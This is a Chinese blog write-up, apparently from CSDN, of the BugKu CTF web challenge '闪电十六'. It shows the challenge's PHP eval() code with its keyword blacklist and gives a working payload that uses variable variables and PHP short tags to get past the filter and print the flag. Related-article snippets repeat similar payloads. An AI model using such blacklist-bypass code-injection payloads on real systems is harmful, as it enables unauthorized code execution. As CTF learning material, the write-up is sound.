BugKu_闪电十六鞭

最新推荐文章于 2024-03-31 20:22:27 发布
最新推荐文章于 2024-03-31 20:22:27 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: CTF 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44959263/article/details/119751598
版权

在这里插入图片描述
访问目标地址

在这里插入图片描述
发现了一段php代码,又是代码审计的问题

分析代码

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

flag变量长度等于$exam的长度,长度为49

flag变量不能包含` ,, . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ;

eval($_GET[‘flag’]) === sha1($flag)

其中第三点等于sha1可以利用短标签绕过判断,直接利用eval输出$flag变量的值,构造payload绕过对flag字符串的过滤,payload为?flag=$a='blag';$a{0}='f';?>11111111111111111;<?=$$a;?>,得到flag{78062956} ;其中?>用于闭合开头的<?php 标记,111111是用来填充长度的,

其中<?=$var?><?php echo $var; ?>的效果是一样的,用于输出某个变量

在这里插入图片描述
成功得到flag!

Kobalos Baku
关注
专栏目录
Bugku CTF 每日一题 闪电十六
彼岸花苏陌的博客
01-16 1089
闪电十六 点开发现出现源码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
Bugku_Misc_baby_flag.txt
Le1a's Blog
05-13 616
附件下载密码:Le1a 下载附件得到一个压缩包baby_flag.zip 打开得到baby_flag.txt,打开观察发现这是一个图片文件 将文件后缀改为.jpeg得到一张图片 用Winhex打开图片发现有RAR压缩包的头 将这一部分数据复制下来另存为一个后缀为.rar的文件 但是发现压缩包打不开… 发现其文件头存在问题,Rar的文件头一般是52617221,这里刚好把52和72换了个位置,修改好后,得到一个正确的rar文件,打开后发现存在加密 根据题目提示hint:还能再高亿点点应该是去修
[bugku]-闪电十六
weixin_52116519的博客
03-30 678
==============================简化源码============================== 1、strlen($_GET['flag']) != strlen($exam) flag变量长度为49 2、flag过滤了 '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is' 3、(eval($_GET['flag']) === sha1($flag)) 原理 eva.
闪电十六
qq_48511129的博客
01-27 793
这题主要考察分析php代码能力,分析代码构造url,进行过滤 http://114.67.246.176:18660/?flag=a=′fla∗′;a='fla*';a=′fla∗′;a{3}=‘g’;?>11111111111111111;<?=$$a;?>得到flag
BugKu——闪电十六
qq_52051736的博客
03-08 600
打开题目链接 是一段php代码,应该是代码审计问题,首先分析源码 目标是输出flag变量,所以flag就在flag变量里面 输出条件有三个 flag变量长度等于$exam的长度,长度为49 flag变量不能包含` , “ , . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ; eval($_GET[‘flag’]) === sha1($flag) 前面两个条件好绕过,就是第三
二十八、bugku 闪电十六
山兔的博客
09-05 568
php字符对照 &quot=" <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strl
BWVS.rar_BWVS bugku_vulnerability
09-23
Bugku Web Vulnerability System
BugKu_WEB_(1)
young的博客
07-21 1043
BugKu平台练习wp
Bugku_Misc_Licking dog diary
Le1a's Blog
05-16 384
附件下载密码:Le1a 下载附件得到一个加密压缩包xka.rar和一个图片my_baby.png(话说这不是mumuzi的头像吗 图片用StegSolve打开发现LSB隐写!点击Save Bin另存为一个新的文件 文件中发现了elf文件数据 将elf文件头前面的部分全部删掉,然后保存(注意elf前的空格不能删) 尝试直接运行,结果报错,winhex继续分析,发现末尾有一段文字要删掉 丢入kali里面,再次运行 得到一串箭头↕↱↕↕↔↙↕↙↔↓↕→↕→↔↗↔↘↕↺↕↲↔↗↔↕↔↗↔↕↔↗↔↕= 用
Bugku 闪电十六
m0_63253040的博客
03-11 923
进入环境,是一串php代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
bugku-闪电十六
小诺言的博客
04-05 1550
闪电十六
bugku ctf 闪电十六 <?= ?> 短标签
YouthBelief的博客
03-08 467
0x00 解题须知 在php中 <? ?>和<?= ?>是短标签 而<?php ?>是长标签 其中<?= 是代替 <? echo的 <? ?>代替的是<?php ?> php.ini文件 可以配置php 是否可以解析短标签 0x01 解题 1.1 分析代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.s
bugku web篇(二)
weixin_51387754的博客
08-29 557
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。...
bugku web 闪电十六
最新发布
l181954187的博客
03-31 437
肯定后面是要补全的,
Bugku解题 web 【四】
weixin_46703850的博客
04-04 1666
Bugku解题 web28.web1929.聪明的php 介绍:记录解题过程
bugku】web24
EC_Carrot的博客
12-23 239
题目 打开题目,查看源代码发现code.txt界面,点开来发现源码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){
BugKuCTF 杂项 闪的好快
无限迭代中......
09-16 613
https://ctf.bugku.com/files/6dcac03199e58749725cbcd9cc958a9b/masterGO.gif 题解: 工具: GifSplitter Photoshop StegSolve 下载 GifSplitter分离GIF文件 没法扫 PS打开GIF也一样 某网站分离https://tu.sioe.cn/gj...
bugku ctf 杂项 闪的好快 writeup
sx234com的博客
01-25 1381
访问图片 发现确实闪的很快,想了一下应该可以用photoshop去解决。 不过我想了个其他思路。 将闪动的二维码录成视频,使用的是录屏大师录好以后 保存为avi视频。 然后使用360自带的快剪辑进行编辑。 编辑界面如下 现在就好办了。挨个扫描就出来了。  应该解决的方法有很多,找一种自己熟练使用的软件就可以。 扫描二维码的过程记录。 顺利截取到想要的东西。...
bugku file_get_contents
04-08
我不确定您的问题具体是什么,但是如果您正在讨论BugKu平台的file_get_contents功能,则可以说该功能是用于从文件中读取数据的PHP函数。可能存在一些与该功能相关的问题或错误,您需要进一步说明您遇到的问题或情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值